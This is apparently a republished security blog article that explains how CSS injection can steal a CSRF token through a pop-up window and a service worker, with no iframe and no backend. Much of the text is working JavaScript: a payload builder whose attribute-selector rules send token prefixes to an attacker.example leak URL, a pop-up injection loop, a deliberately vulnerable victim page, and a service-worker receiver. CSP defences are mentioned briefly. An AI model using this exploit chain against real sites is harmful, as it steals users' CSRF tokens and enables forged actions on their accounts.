2025-02-24 Update From: SLTechnology News&Howtos (Network Security)
Shulou (Shulou.com) 06/01 Report
This article explains how CSS injection can be used to steal CSRF tokens. The content is short and clear; follow the author's line of thought to understand how the attack works.
CSS needs no introduction. Baidu Encyclopedia describes it as a computer language for expressing the presentation of documents such as HTML (an application of the standard generalized markup language) or XML (a subset of it). Is it only a styling language, though? Not at all: security researchers have been using CSS in penetration tests for years. An earlier write-up describes how attribute selectors, combined with CSS injection and an iframe, can be used to steal sensitive data. That technique depends on framing the victim page, and most mainstream sites forbid framing (with X-Frame-Options or the CSP frame-ancestors directive), so it is rarely practical.
Below I describe a variant that needs no iframe and can steal a CSRF token in about 10 seconds.
Once the token is known, the attacker can complete the CSRF attack immediately, because the victim is already on the attacker's page.
Background
As described in the original article, CSS attribute selectors let a developer select elements by matching a substring of an attribute's value. Three substring forms exist:
[attr^=value] matches if the attribute value begins with the substring
[attr$=value] matches if the attribute value ends with the substring
[attr*=value] matches if the attribute value contains the substring anywhere
Attribute selectors therefore let a stylesheet query the page's HTML for a given attribute and test its value. A benign use case is giving every link whose href starts with "https://example.com" a particular color.
In practice, sensitive values often sit in HTML attributes, and CSRF tokens almost always do: they are stored as the value attribute of a hidden form input.
An injected selector can match that input on a prefix of its value and, when the prefix matches, load an external resource such as a background image from the attacker's server. The request itself tells the attacker that the guessed prefix was right.
Repeating this for each possible next character, the attacker extends the prefix one character at a time until the whole sensitive value is known.
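The prefix-guessing loop described above, written out as an added example (this is not code from the original post). buildPayload emits one rule per candidate character, and the browser's [value^=...] matching is simulated in Node with startsWith so the whole thing runs offline; the input name csrf, the hex alphabet, the sample token and the attacker URL https://attacker.example/leak are assumptions made for the example.

```javascript
// Added example (not from the original post): the attribute-selector
// oracle that recovers a hidden form value one character at a time.
// The browser is simulated: `[value^="..."]` matching is emulated with
// startsWith(), and "loading a background image" is represented by the
// URL a browser would request. Everything below is constructed sample data.

const TOKEN_ALPHABET = "0123456789abcdef";         // assumption: hex token
const LEAK_BASE = "https://attacker.example/leak"; // assumption: attacker endpoint
const SAMPLE_TOKEN = "8f3a1c9e";                   // constructed, not a real secret

// One stylesheet tests every candidate next character at once: each rule
// fetches a distinct URL only if the hidden input's value starts with
// knownPrefix + candidate. At most one rule can match per stylesheet.
function buildPayload(knownPrefix, alphabet, leakBase) {
  return alphabet
    .split("")
    .map(ch => {
      const guess = knownPrefix + ch;
      return `input[name="csrf"][value^="${guess}"]{background:url(${leakBase}?guess=${encodeURIComponent(guess)})}`;
    })
    .join("\n");
}

// Parse the stylesheet back into {guess, url} pairs (simulated browser side).
function parseRules(css) {
  const re = /\[value\^="([^"]*)"\]\{background:url\(([^)]*)\)\}/g;
  const rules = [];
  let m;
  while ((m = re.exec(css)) !== null) rules.push({ guess: m[1], url: m[2] });
  return rules;
}

// Simulated render: return the URLs a browser would fetch for this
// stylesheet given the real value of the hidden input.
function renderAndCollectRequests(css, realToken) {
  return parseRules(css)
    .filter(rule => realToken.startsWith(rule.guess))
    .map(rule => rule.url);
}

// Attacker side: read the confirmed prefix back out of a leaked request URL.
function guessFromLeakUrl(url) {
  const m = /[?&]guess=([^&]*)/.exec(url);
  return m ? decodeURIComponent(m[1]) : null;
}

// Drive the oracle: inject, observe which URL was requested, extend the
// prefix, repeat. Stops early if no rule matched (a character outside the
// alphabet) so a wrong guess is never recorded.
function recoverToken(realToken, tokenLength, alphabet, leakBase) {
  let known = "";
  let injections = 0;
  while (known.length < tokenLength) {
    const css = buildPayload(known, alphabet, leakBase);
    injections += 1;
    const hits = renderAndCollectRequests(css, realToken);
    if (hits.length !== 1) break;
    known = guessFromLeakUrl(hits[0]);
  }
  return { token: known, injections };
}

const demo = recoverToken(SAMPLE_TOKEN, SAMPLE_TOKEN.length, TOKEN_ALPHABET, LEAK_BASE);
console.log(`recovered "${demo.token}" with ${demo.injections} injected stylesheets`);
```

The number of injections equals the token length, because every stylesheet tests all candidates for one position at once; only one rule can fire per render, since the candidates differ in their last character.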
Sites that want to defend against this can deploy a Content Security Policy (CSP): restricting style-src stops attacker-controlled stylesheets from being applied, and restricting img-src (and the other fetch directives) closes the exfiltration channel, since the leak depends on the browser fetching a resource from the attacker's origin. Not reflecting untrusted input into styles at all is the root fix.
No iFrames
To avoid iframes I use an approach similar to one I have discussed before: open a pop-up window and then, on a timer, navigate that pop-up to a new location.
The victim's page, with the injected CSS, still loads in the pop-up, but whether the victim allows framing no longer matters. Because the first window.open is triggered by a user event (a click), the browser's pop-up blocker does not interfere.
To force the victim page to reload on every iteration, I navigate the pop-up to a throwaway URL between two CSS injections, as follows:
// Same window name each time, so the second open navigates the existing pop-up instead of opening another.
var win2 = window.open('https://security.love/anything', 'popup', "top=100000,left=100000,menubar=1,resizable=1,width=1,height=1");
// The victim page decodes the injection parameter with decodeURIComponent, so it is percent-encoded here.
var win2 = window.open(`https://security.love/cssInjection/victim.html?injection=${encodeURIComponent(css)}`, 'popup', "top=100000,left=100000,menubar=1,resizable=1,width=1,height=1");
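The pop-up driver behind that snippet, as an added example (not the original post's code). openWindow and the timer are parameters so the scheduler can be exercised outside a browser; in the attacker page they are window.open and setTimeout. The victim and throwaway URLs and the feature string are the ones from the post; the window name "leakwin", the 500 ms interval and the two sample stylesheets are assumptions.

```javascript
// Added example (not the original post's code): driving the pop-up.
// `openWindow` is a parameter so the scheduler can run outside a browser;
// in the attacker page it is window.open. URLs and the feature string
// follow the post; the window name and interval are assumptions.

const VICTIM_URL = "https://security.love/cssInjection/victim.html";
const RESET_URL = "https://security.love/anything";
const FEATURES = "top=100000,left=100000,menubar=1,resizable=1,width=1,height=1";
const WINDOW_NAME = "leakwin"; // assumption: any fixed name makes every open reuse one pop-up

// Constructed sample payloads standing in for the generated stylesheets.
const SAMPLE_PAYLOADS = [
  'input[name="csrf"][value^="8"]{background:url(/leak?guess=8)}',
  'input[name="csrf"][value^="8f"]{background:url(/leak?guess=8f)}',
];

// Navigations for one stylesheet: the throwaway URL first (the post uses it
// to force a fresh load of victim.html on the next open), then the victim
// with the CSS in the query string. The victim decodes the parameter with
// decodeURIComponent, so it must be percent-encoded here.
function navigationsFor(css) {
  return [RESET_URL, `${VICTIM_URL}?injection=${encodeURIComponent(css)}`];
}

// Open each navigation in the same named window; returns the URLs used.
function injectOnce(openWindow, css) {
  const urls = navigationsFor(css);
  for (const url of urls) openWindow(url, WINDOW_NAME, FEATURES);
  return urls;
}

// One stylesheet per tick. setTimer is injectable for testing; in the
// browser it is setTimeout. Returns every URL opened (complete once the
// timer has fired for each payload).
function startInjectionLoop(openWindow, payloads, intervalMs, setTimer = setTimeout) {
  let index = 0;
  const opened = [];
  function tick() {
    if (index >= payloads.length) return;
    opened.push(...injectOnce(openWindow, payloads[index]));
    index += 1;
    setTimer(tick, intervalMs);
  }
  tick();
  return opened;
}

// Browser bootstrap: the loop must start from a user gesture, otherwise the
// pop-up blocker refuses the first window.open.
if (typeof document !== "undefined" && typeof window !== "undefined") {
  document.addEventListener(
    "click",
    () => startInjectionLoop(window.open.bind(window), SAMPLE_PAYLOADS, 500),
    { once: true }
  );
}
```

In the real attack the payload list is not fixed in advance: each tick builds the next stylesheet from the prefix confirmed so far, so the loop runs token-length times and finishes in seconds.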
No backend server
Sending the leaked data to a backend server is covered in CureSec's article. But CSRF is a client-side attack, so a method that needs no server at all saves overhead and simplifies the operation.
To receive the resource requests the victim's browser makes, we can use a service worker to intercept and read them. A service worker only intercepts requests made by pages on its own origin, and in my demo the victim and attacker pages are already on the same origin.
At the time of writing, Chrome was expected to ship an experimental feature that would let service workers intercept cross-origin requests as well.
With this, the whole attack runs on the client: one click on the link and the user's CSRF token is recovered within about 10 seconds, as demonstrated below.
Demo
As mentioned above, because I don't want to run a web server, I use a service worker to intercept the requests and stand in for the server-side component. The demo currently works only in Chrome.
First, I created a vulnerable target with a DOM-based CSS injection and placed a sensitive token on the page. The script HTML-encodes the left and right angle brackets before writing the injected fragment, so the injection cannot break out of the style context into a script tag, but any other CSS flows straight into the stylesheet:
// Deliberately vulnerable: the query string is reflected into a style block.
var fragment = decodeURIComponent(window.location.href.split("?injection=")[1]);
// Encoding < and > blocks a </style><script> breakout; plain CSS survives untouched.
var htmlEncode = fragment.replace(/</g, "&lt;").replace(/>/g, "&gt;");
// Sink: the fragment is written inside a style element (the sink was redacted in this copy of the post and is reconstructed here).
document.write("<style>" + htmlEncode + "</style>");
Next, the victim's CSS is loaded as described above, and we steal (guess) the sensitive value one character at a time.
On the receiving side, a service worker intercepts the requests and relays them to the page via postMessage; the page stores the recovered token in localStorage for later use. A backend web server could equally send the CSRF token back to the attacker's page via WebSockets or polling.
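The serverless receiving side, as an added example (not the demo's own code). The worker half belongs in sw.js and the page half in the attacker page; they are shown together here, with the browser-specific parts calling small pure helpers. The /leak path, the worker URL /sw.js and the localStorage key csrf_token are assumptions; the shared origin between victim and attacker is the demo's precondition, since that is the only reason the worker sees the victim's image requests.

```javascript
// Added example (not the demo's own code): receiving the leaks without a
// backend. Worker half (sw.js) and page half are shown in one file for
// reading; split them when deploying. Path, worker URL and storage key
// are assumptions; the pure helpers are what the browser code calls.

const LEAK_PATH = "/leak";        // assumption: path the injected url() points at
const STORAGE_KEY = "csrf_token"; // assumption

// Is this request one of our leaks? If so, return the confirmed prefix.
function extractGuess(requestUrl) {
  const url = new URL(requestUrl);
  if (url.pathname !== LEAK_PATH) return null;
  return url.searchParams.get("guess");
}

// Prefixes normally arrive in order, but a shorter one can show up late
// (e.g. a retried image fetch): keep what we have when the new report is
// a prefix of it, otherwise trust the newest report.
function mergeKnownPrefix(stored, leaked) {
  if (!leaked) return stored || "";
  if (!stored) return leaked;
  if (stored.startsWith(leaked)) return stored;
  return leaked;
}

// Page side: fold one worker message into storage and return the new value.
// `storage` is anything with getItem/setItem (localStorage in the browser).
function handleLeakMessage(storage, message) {
  if (!message || message.type !== "leak") return storage.getItem(STORAGE_KEY);
  const merged = mergeKnownPrefix(storage.getItem(STORAGE_KEY), message.guess);
  storage.setItem(STORAGE_KEY, merged);
  return merged;
}

// Worker side (sw.js): answer the leak request locally so no server is
// needed, and relay the prefix to every open page via postMessage.
if (typeof self !== "undefined" && typeof ServiceWorkerGlobalScope !== "undefined") {
  self.addEventListener("fetch", event => {
    const guess = extractGuess(event.request.url);
    if (guess === null) return; // not a leak: let the network handle it
    event.respondWith(new Response("", { status: 204 }));
    event.waitUntil(
      self.clients.matchAll({ type: "window" }).then(clients => {
        for (const client of clients) client.postMessage({ type: "leak", guess });
      })
    );
  });
}

// Page side: register the worker and accumulate the token in localStorage.
if (typeof window !== "undefined" && typeof navigator !== "undefined" && navigator.serviceWorker) {
  navigator.serviceWorker.register("/sw.js"); // assumption: worker served at /sw.js
  navigator.serviceWorker.addEventListener("message", event => {
    const known = handleLeakMessage(localStorage, event.data);
    console.log("known CSRF token prefix:", known);
  });
}
```

The worker must already control the page when the pop-up loads the victim, so register it first and only then start the injection loop; the 204 response keeps the victim page from logging a failed image load while still letting the match reach the attacker page.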
The demo currently works only in Chrome:
Demo
If your browser supports it, click anywhere on the page and watch the CSRF token being guessed character by character.
Conclusion
Interestingly, reflected CSS injection is more dangerous here than stored CSS injection, because a stored injection needs a round trip to the server to update the stylesheet between renders, whereas a reflected one lets the attacker change the payload on every navigation of the pop-up.
The perceived severity of CSS injection has swung back and forth over the years; old versions of Internet Explorer even allowed JavaScript execution from within CSS. This demo shows that CSS injection, that is, rendering untrusted CSS on your domain, can still cause serious security problems.